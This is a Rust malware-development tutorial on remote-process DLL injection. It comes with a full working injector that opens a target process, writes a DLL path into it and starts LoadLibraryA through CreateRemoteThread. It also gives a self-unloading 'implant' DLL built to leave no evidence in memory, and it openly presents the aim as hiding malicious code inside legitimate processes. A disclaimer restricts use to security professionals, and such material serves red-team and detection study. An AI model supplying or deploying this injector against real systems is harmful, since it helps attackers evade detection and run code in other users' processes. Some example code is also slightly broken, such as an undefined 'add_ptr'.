Remote process DLL injection in Rust

You can't see me if I'm over there hiding inside the sofa.


Intro

This is going to be a meaty post; so strap in. In this, we need 2 projects - 1 is the DLL we built last time (BUT see below as we make updates to it - we will do this at the very end of this blog post), and 2 is a new project, where we will be injecting a DLL into a remote process with Rust.

Links:

  1. GitHub - Simple rust DLL
  2. GitHub - The remote process DLL injector

We are going to cover some ground on Windows Processes, Threads, Handles, and perhaps most importantly, function pointers. We will be using function pointers several times with this remote process DLL Injector, so hopefully this post will help you to understand what they are!

If you are new to malware development in Rust, check out my first blog post in this series here.

Legal disclaimer applies, by reading on you acknowledge that, see the legal disclaimer here. In short, you must not use the below information for any criminal or unethical purposes, and it should only be used by security professionals, or for those interested in cyber security to deepen your knowledge. I firmly believe taking a proactive approach to security through penetration testing, ethical hacking and red teaming is one of the best ways we can improve cyber security as a whole in society.

Theory: What is Process Injection

Process injection, T1055 is the practice of injecting code into other processes as to evade detection and to aid in privilege escalation. There are a number of ways to achieve process injection, but by far one of the most popular is DLL injection, aka T1055.001. DLL Injection is simply the practice of injecting a DLL into a running process.

If you think about it, if your implant is called malware.exe, and somebody looks in the Windows task manager and sees malware.exe, they’re gonna be pretty damn suspicious. Imagine if instead of running malware.exe as a constant process, your malware can hide inside of notepad, or within Windows explorer, or any of the hundreds of other legitimate windows processes, running on your computer right now! Well, buckle up as that’s exactly what we are going to do now!

We will explore why this technique works below, however this technique is inherently easy for EDR (enddpoint detection and response) to detect (EDR is basically an antivirus on steroids). In fact, the bog standard Windows Defender will also likely detect this technique,

Without doing a deep dive on EDR here, this works mostly for two reasons: 1) The EDR/AV will statically check your binary, when it does this it will look at what functions the binary is calling, in our case we are going to use Win32 API functions which are inherently suspicious, especially one after the other. There is very little legitimate reason to do DLL / Process injection into a remote process in day to day computing. 2) This will likely be confirmed by any dynamic analysis going on by the EDR/AV and associate a risk score with the activity.

If you are interested in this technique but using EDR evasion, check my blog post here.

Theory: Processes and how this works

First off - what is a process? Most people tend to think of a process as the bit of code that runs on the computer, however this isn’t quite accurate. A process however is a container for a pool of resources that the program can use when it’s executing. It includes a process ID, a thread, a program (the code that executes), and a virtual address space. This allocated memory includes the stack, which keeps track of the active function calls and local variables, and the heap, which is used for dynamic memory allocation.

Each process requires at least one thread, and a thread is an entity within a process which is scheduled for execution. An easier analogy is: if a process is a factory, a thread is a worker.

The program in a process could load additional modules, such as DLLs, at runtime, using APIs such as LoadLibraryA as we did in the first tutorial in this series. What happens here is Windows under the hood loads this library into the memory space of the process; thus increasing the size of the process by the size of the loaded library.

So here’s the key bit, we are going to cause Windows to use the LoadLibraryA function (in a clever way) in another process. How do we get another process to call LoadLibraryA? Well, we will cover that below.

A high level view of the methodology looks like this:

Remote process DLL injection rust

In short,

  1. We use OpenProcess (Win32 / Rust) to get a handle to the target process.
  2. We then get a handle to our own “kernel32.dll” in our process with GetModuleHandleA (Win32 / Rust), we do this so that we can then find the address of LoadLibraryA (in the next step)
  3. Now we can get the virtual address of LoadLibraryA from Kernel32.dll. We can do this with the API call GetProcAddress (Win32 / Rust). One important thing to note here, and hopefully it is communicated in the graphic, Windows maps Kernel32.dll into the same base address in every process, so the address of LoadLibraryA in my process, will be the same as the address of LoadLibraryA in your process; we will cover this in more detail below in the function pointers section.
  4. Next we use VirtualAllocEx (Win32 / Rust) to allocate memory in the remote process, equal to the size (including the null terminator) of the path to the DLL we want to inject. So, if the DLL is located at "C:\Users\pwned\Downloads\evil.dll\0", the size of the buffer we will be allocating will be equal to the length of that string.
  5. Write the path of the DLL into the buffer in the remote process with WriteProcessMemory (Win32 / Rust)
  6. Finally, we can use CreateRemoteThread (Win32 / Rust) to create a thread in the target process, passing a function pointer to the location of LoadLibraryA, and the path of the DLL as an argument. If you don’t understand what this means, don’t worry, I got you covered in one of the below sections.

This sequence of events is highly recognisable by EDR, there are not a lot of reasons for legitimate executables to be doing all these things one after the other, so keep that in mind.

The code

Alright, set up a new Rust project with cargo and import the Windows API from here as we have done in the previous blog posts (if this is new to you, please go and check them).

For this project, our cargo.toml file needs the following dependencies:

[dependencies]
windows = { version = "0.54.0", features = ["Win32_System_Threading", "Win32_System_LibraryLoader", "Win32_System_Memory", "Win32_System_Diagnostics_Debug", "Win32_Security"] }

The first thing we want to do, is to create a function to collect the command line argument which will be passed into the program, which will be the process ID of the process you want to inject into:

fn collect_proc_addr() -> u32 {
    let args: Vec<String> = env::args().collect();

    if args.len() != 2 {
        eprintln!("[-] PID required.");
        exit(1);
    }

    let pid = args[1].clone();
    let pid_as_int: u32 = pid.parse().unwrap();

    pid_as_int
}

Then in main, we can call it:

fn main() {
    // COLLECT ARGS
    let pid: u32 = collect_proc_addr();
}

Awesome, now we can focus on doing some cool stuff.

REMEMBER when programming in Rust you will need to have both the Win32 API and the Rust Windows API docs open. I won’t be going through each and every parameter required for the below function calls, only the important ones, so please make sure you read the docs, I have left the links in the above numbered list :).

We need to get a handle to the process we wish to inject into, we can do this with OpenProcess, which will return a handle. Using the docs, we can see that the function definition is:

C:

HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

and in Rust:

pub unsafe fn OpenProcess<P0>(
    dwdesiredaccess: PROCESS_ACCESS_RIGHTS,
    binherithandle: P0,
    dwprocessid: u32
) -> Result<HANDLE>
where
    P0: IntoParam<BOOL>,

The biggest thing we need to worry about here is what PROCESS_ACCESS_RIGHTS means, well, using the Win32 API documentation (here) we can pick what we want, for the purposes of this we need PROCESS_VM_OPERATION and PROCESS_VM_WRITE which are defined respectively as:

  1. Required to perform an operation on the address space of a process
  2. Required to write to memory in a process using WriteProcessMemory.

So, in our code this looks like:

// GET HANDLE TO PID
let h_process = unsafe { OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, false, pid) };
let h_process = match h_process {
    Ok(h) => {
        println!("[+] Got handle to process ID {pid}, handle: {:?}", h);
        h // return the handle
    },
    Err(e) => panic!("[-] Could not get handle to pid {pid}, error: {e}"),
};

Next, to get a handle to Kernel32.dll running in our process, we use GetModuleHandleA, passing in the parameter of "Kernel32.dll" like so:

// GET HANDLE TO KERNEL32 DLL
// so this will get us the handle to K32.dll in our process
let h_kernel32 = unsafe { GetModuleHandleA(s!("Kernel32.dll")) };
let h_kernel32 = match h_kernel32 {
    Ok(h) => {
        println!("[+] Handle to Kernel32.dll: {:?}", h);
        h
    }
    Err(e) => panic!("[-] Could not get handle to Kernel32.dll, {e}"),
};

Now we have the handle to Kernel32.dll, we need to access the virtual address within Kernel32.dll where the exported function LoadLibraryA is. If function pointers are new to you, we will shortly be exploring those in more detail, for now just push the “i believe” button. When we match on load_library_fn_address, we cast the address as *const () in preparation for a later operation where we will use the transmute function. Again, if this is alien to you, don’t worry.

// GET FUNCTION POINTER TO LOAD LIBRARY
let load_library_fn_address = unsafe { GetProcAddress(h_kernel32, s!("LoadLibraryA")) };
let load_library_fn_address = match load_library_fn_address {
    None => panic!("[-] Could not resolve the address of LoadLibraryA."),
    Some(address) => {
        let address = address as *const (); // better cast as per https://doc.rust-lang.org/std/mem/fn.transmute.html
        println!("[+] Address of LoadLibraryA: {:p}", address);
        address
    }
};

Raw pointers in Rust

I’m going to give a quick primer as to what pointers are. For some, especially those starting out, are a relatively advanced topic, so I would encourage you to go away and explore pointers in more detail.

In programming, variables are stored within a process’s virtual memory, specifically on the stack or the heap. Each time you create a variable, it occupies a unique location in memory and is assigned an address—let’s say, 1234. A pointer, is simply a variable which instead of holding a value, holds the address of another variable. Putting this into a scenario, in Rust, you could visualise what’s going on like so:

    let the_answer_to_everything = 42; // an integer
    println!("{}", the_answer_to_everything); // will print 42
    println!("{:p}", &the_answer_to_everything); // will print 0x41ff35f6cc

So, this tells us that the variable, the_answer_to_everything holds the value 42, but the address in memory of where the_answer_to_everything is, is 0x41ff35f6cc. Addresses in binaries and memory are represented in hexadecimal.

Rust has a strong emphasis on “safety”; what does this mean? In C, you can pass around pointers like they are going out of fashion. Imagine having a variable containing data that’s too computationally expensive to duplicate. Instead of passing the actual data into functions, you could pass a pointer to the data’s location, allowing those functions to access and even modify the original data. Convenient right? Rust allows something similar through references (using the ‘&’ operator).

C and C++ are quite permissive with pointers, which can lead to issues. Consider a variable as a placeholder for an address: if the data at that address changes, say it gets deallocated or moved, your pointer still points to a location in memory, but the data it used to point to is no longer valid. You end up with a valid pointer to invalid data.

Rust mitigates this risk with its strict borrowing rules, ensuring references to data are valid and safe to use. But when it comes to low-level system interactions, such as calling Windows API functions or interfacing with drivers, we often need to work with raw pointers. Rust allows us to do this via the unsafe keyword. The unsafe block allows us to work directly with pointers, and acts as a visual aid to the programmer that you are entering territory which could lead to memory exceptions and vulnerabilities.

In Rust, there are two ways of refering to a pointer, respectively the below relate to an immutable pointer, and a mutable pointer:

*const T // a IMMUTABLE pointer does not allow direct modification of the value it points to 
*mut T // so if you want to change its data, you need a MUTABLE pointer

In the below section, you will see we are using a pointer of:

as *const c_void

So hopefully you recognise the pattern in the syntax.

Lets provide a quick example of using raw pointers in Rust. In the below example we assign 42 to a mutable variable. Then we create two references, one as a constant pointer, and the other as a mutable pointer. Note the type T in the pointer syntax, in our case i32. Then we print the value, and we can see the location in memory where our variable lives. AKA where the variable points to. When we dereference it with the dereference operator *, we can get the value at that memory location, which is 42.

We then use unsafe to change the value of the data at that pointer location to 99, then when we print it out again, the variable is still pointing to the same region of memory (a 32-bit integer (i32) memory location), but the value of the data at that location has now changed, to 99.

fn main() {
    let mut my_int = 42; // declare a mutable integer variable initialized to 42

    // create a constant and a mutable raw pointer to the integer variable
    let r1 = &my_int as *const i32; // raw pointer to an i32, cannot directly modify the value it points to
    let r2 = &mut my_int as *mut i32; // can be used to modify the value it points to

    // unsafe block needed to dereference raw pointers
    unsafe {
        // prints Before change - r1 points to: 0x16b98aecc, dereferenced value: 42
        println!("Before change - r1 points to: {:?}, dereferenced value: {}", r1, *r1);
    }

    // change the value at the memory location of my_int (as r2 is a reference to that memory location)
    unsafe { *r2 = 99; }

    unsafe {
        // prints After change - r1 still points to: 0x16b98aecc, dereferenced value: 99
        println!("After change - r1 still points to: {:?}, dereferenced value: {}", r1, *r1);
    }
}

Back to our code

So now we need to allocate memory within the target process for a buffer the length of the path of our DLL. This isn’t the length of the DLL (we aren’t stuffing the binary blob of the DLL into the target process, just the path to the DLL). Once we have successfully allocated the memory, we can then write the string into the allocated memory. To do this we will be using the Win32 API functions VirtualAllocEx and WriteProcessMemory.

A few notes, firstly in the VirtualAllocEx documentation, the function definition is:

LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

This is looking for a handle to the target process (we have that thanks to OpenProcess). lpAddress is a pointer to a desired starting address for the region of pages we wish to allocate, this is optional and we don’t want to use this feature. dwSize is the size of the region of memory we wish to allocate (AKA the length of the string which houses the path to the DLL). flAllocationType is the type of memory allocation, in our case we want: MEM_COMMIT and MEM_RESERVE. Finally flProtect we can set to PAGE_EXECUTE_READWRITE, which gives execute, read-only, or read/write access to the committed region of pages.

A note on WriteProcessMemory, the definition requires a pointer to the data that we are going to write into the buffer. The way to write an LPCVOID in rust is path_to_dll.as_ptr() as *const c_void. A void pointer is basically a pointer to ‘anything’, this is C telling us it is a loosey goosey.

 // ALLOCATE MEMORY FOR OUR ADDRESS
let path_to_dll = "C:\\path\\to\\dll\\rust_dll.dll";

let remote_buffer_base_address = unsafe {
    VirtualAllocEx(h_process,
                    None,
                    size_of_val(path_to_dll),
                    MEM_COMMIT | MEM_RESERVE,
                    PAGE_EXECUTE_READWRITE,
) };

if remote_buffer_base_address.is_null() {
    panic!("[-] Failed allocating memory into remote process for DLL Path");
}

println!("[+] Remote buffer base address: {:p}", remote_buffer_base_address);

// Write to the buffer
let mut bytes_written: usize = 0;
let buff_result = unsafe {
    WriteProcessMemory(h_process, remote_buffer_base_address, path_to_dll.as_ptr() as *const c_void, size_of_val(path_to_dll), Some(&mut bytes_written as *mut usize))
};

match buff_result {
    Ok(_) => println!("[+] Bytes written to remote process: {:?}", bytes_written),
    Err(e) => panic!("[-] Error writing remote process memory: {e}"),
}

Function pointers

Now we have a rough idea what a pointer is (from the above section), lets introduce the function pointer:

A function pointer is just that, a pointer to a function. Instead of the pointer pointing to a variable, the function pointer will point to the memory location of the entry point to a function. Imagine you have a street of businesses, each business will do something for you, and give you something back. At the start of the street you are given a map which has the address of each business on; now you can go directly to that business and exchange your goods.

Putting this into a code example, Rust has a particular way of making you define a function pointer:

// A function named 'add'
fn add(a: i32, b: i32) -> i32 {
    a + b
}

fn main() {
    // This is a function pointer named `operation` and assign it to the `add` function
    let operation: fn(i32, i32) -> i32 = add;
    
    // Now you can use `operation` to call the `add` function
    let result = operation(2, 3);
    println!("The result is: {}", result); // Will print 5
    println!("Add location: {:p}", add_ptr as *const ());// Will print 0x7ff713b413d0, the location of the function
}

The variable operation can hold a pointer to any function that takes two i32 variables and returns an i32 variable. In this code, we have assigned it to the function add, meaning calling option(2, 3) is the same as calling add(2,3).

The below graphic shows virtual addresses next to each function, so if you wanted to call one of these functions, you could do by getting the address of the function, then calling that.

Remote process DLL injection rust

Back to our remote DLL injection, we are using the API function CreateRemoteThread in order to create a thread in another process. This function expects an input parameter called lpStartAddress, which is a pointer to the function the new thread will execute. In our case, we want to point to the function LoadLibraryA which is found in Kernel32.dll (which itself is loaded into every Windows process).

In the above code, we have already got the address of LoadLibraryA, however to use this address we need to correctly cast it to the type LPTHREAD_START_ROUTINE. The Rust Windows API tells us that this type signature is:

pub type LPTHREAD_START_ROUTINE = Option<unsafe extern "system" fn(lpthreadparameter: *mut c_void) -> u32>;

Whilst this might make you want to quit Rust forever, it’s not as complicated as it first looks. This simply is telling us that an unsafe external function requires 1 argument, a *mut c_void, and returns a u32, wrapped in the Option enum. The *mut c_void is a raw pointer to any type of data (the const void type in C).

As we have a pointer to LoadLibraryA, we can cast this using std::mem::transmute. In the first example in the Rust documentation, it explains how transmute can be used to turn a pointer into a function pointer, which is what we are doing here. And this is how we can do it:

let load_library_fn_address: Option<unsafe extern "system" fn(*mut c_void) -> u32> = Some(
    unsafe { std::mem::transmute(load_library_fn_address) }
);

So now we have a correctly typed function pointer to LoadLibraryA. The function CreateRemoteThread also requires another pointer as the next argument, and this is a pointer to an argument to be passed into LoadLibraryA. Well, looking at the documentation, LoadLibraryA takes in a PCSTR (a pointer to a string), and this is the path to the DLL (or EXE) we wish to inject.

There is one final thing to explain before showing the last bit of code, and hopefully it is a question you are asking yourself as you are reading along. We have the address of LoadLibraryA in our process; surely we need the address of LoadLibraryA in the remote process? Yes, we do. However there is 1 really cool feature of Windows this DLL injection technique takes advantage of, Kernel32 is mapped into every process at the same base address; therefore, the base address of Kernel32.dll in the local process is the same as that in the remote process, so we can be confident that the address we are referencing for LoadLibraryA (which comes under Kernel32) will be the mapped to the same location across all addresses. I don’t know this for fact, but I suspect the actual address of LoadLibraryA may change between different builds of Windows as changes to the API / DLLs and Kernel are made, so hardcoding this would be ill-advised.

If the above gave you a minor brain injury, don’t worry. It did the same to me first time ‘round. Go for a walk, and come back to it with a fresh head.

So, the code for the final part looks like this:

    // correctly cast the address of LoadLibraryA
    let load_library_fn_address: Option<unsafe extern "system" fn(*mut c_void) -> u32> = Some(
        unsafe { std::mem::transmute(load_library_fn_address) }
    );

    let mut thread: u32 = 0;

    // create thread
    let h_thread = unsafe { CreateRemoteThread(
        h_process,
        None, // default security descriptor
        0, // default stack size
        load_library_fn_address, // function pointer to LoadLibraryA
        Some(remote_buffer_base_address), // pointer to param to pass into LoadLibraryA
        0,
        Some(&mut thread as *mut u32), // pass by reference a u32 to store the thread id
    )};

    match h_thread {
        Ok(h) => println!("[+] Thread started, handle: {:?}", h),
        Err(e) => panic!("[-] Error occurred creating thread: {e}"),
    }

You can find the full project here on my GitHub.

A DLL update: automatic unloading

If you have followed along with my previous tutorial on this blog, making a DLL in Rust (or on my YouTube video here), then there is one thing we need to quickly amend; we want the DLL to unload itself on process detach. To do this, we are going to make a new function, spawn_thread_for_unloading_dll. This function will be called when the implant (AKA the DLL) has finished whatever it was there to do. To clean up after itself, it’s going to spawn a new thread, and in that thread call FreeLibraryAndExitThread, taking a handle to the module (AKA the DLL) as a parameter, thus freeing the library.

Due to the way Windows loads libraries (for example how here we will use LoadLibraryA in the remote process), essentially, you will be prevented from loading the same module twice. You can instead use the FreeLibrary Win32 API call (or FreeLibraryAndExitThread), then load the library again.

When a DLL is loaded or unloaded, Windows employs a Loader Lock to synchronise some operations, preventing multiple threads from simultaneously performing actions that could lead to race conditions or inconsistencies within the process’s memory space. This however, introduces risks of deadlocks and buggy code.

To mitigate this, we now launch the main DLL functionality from a new thread, which sidesteps potential deadlocks by avoiding direct operations within DllMain that could invoke the Loader Lock.

We introduce an enum to determine which function to call (the attach function, or the function to unload the library) into CreateThread (via a function pointer).

To ensure the module is cleaned up properly, we can spawn a new thread to call FreeLibrary, removing the library from the process.

The refactored DLL looks like so:

use std::ffi::c_void;
use windows::{Win32::UI::WindowsAndMessaging::{MessageBoxA, MB_OK}, Win32::System::SystemServices::*,};
use windows::core::s;
use windows::Win32::Foundation::HINSTANCE;
use windows::Win32::System::LibraryLoader::FreeLibraryAndExitThread;
use windows::Win32::System::Threading::{CreateThread, LPTHREAD_START_ROUTINE, THREAD_CREATION_FLAGS};

static mut HMODULE_INSTANCE: HINSTANCE = HINSTANCE(0); // handle to the module instance of the injected dll

enum LoadModule {
    FreeLibrary,
    StartImplant,
}

#[no_mangle]
#[allow(non_snake_case)]
fn DllMain(hmod_instance: HINSTANCE, dw_reason: u32, _: usize) -> i32 {
    match dw_reason {
        DLL_PROCESS_ATTACH => unsafe {
            HMODULE_INSTANCE = hmod_instance; // set a handle to the module for a clean unload
            spawn_thread(LoadModule::StartImplant); // start implant in a new thread
        },
        _ => (),
    }

    1
}

/// Entrypoint to the actual implant to be spawned as a new thread ffom DLL_PROCESS_ATTACH.
/// This should help to prevent problems whereby a LoaderLock interferes with our implant.<br/><br/>
/// Think of this as calling a function to start something from main().
#[no_mangle]
unsafe extern "system" fn attach(_lp_thread_param: *mut c_void) -> u32 {
    MessageBoxA(None, s!("Hello from Rust DLL"), s!("Hello from Rust DLL"), MB_OK);

    // implant completed execution, unload the DLL
    spawn_thread(LoadModule::FreeLibrary);

    1
}

/// Spawn a new thread in the current injected process, calling a function pointer to a function
/// will run.
fn spawn_thread(lib_to_load: LoadModule) {
    unsafe {
        // function pointer to where the new thread will begin
        let thread_start: LPTHREAD_START_ROUTINE;

        match lib_to_load {
            LoadModule::FreeLibrary => thread_start = Some(unload_dll),
            LoadModule::StartImplant => thread_start = Some(attach)
        }

        // create a thread with a function pointer to the region of the program we want to execute.
        let _thread_handle = CreateThread(
            None,
            0,
            thread_start,
            None,
            THREAD_CREATION_FLAGS(0),
            None,
        );
    }
}

#[no_mangle]
/// Unload the DLL by its handle, so that there is no live evidence of hte DLL in memory after its
/// finished its business, plus allows for loading multiple of the same DLL into the same process
unsafe extern "system" fn unload_dll(_lpthread_param: *mut c_void) -> u32 {
    MessageBoxA(None, s!("Unloading"), s!("Unloading"), MB_OK);
    FreeLibraryAndExitThread(HMODULE_INSTANCE, 1);
}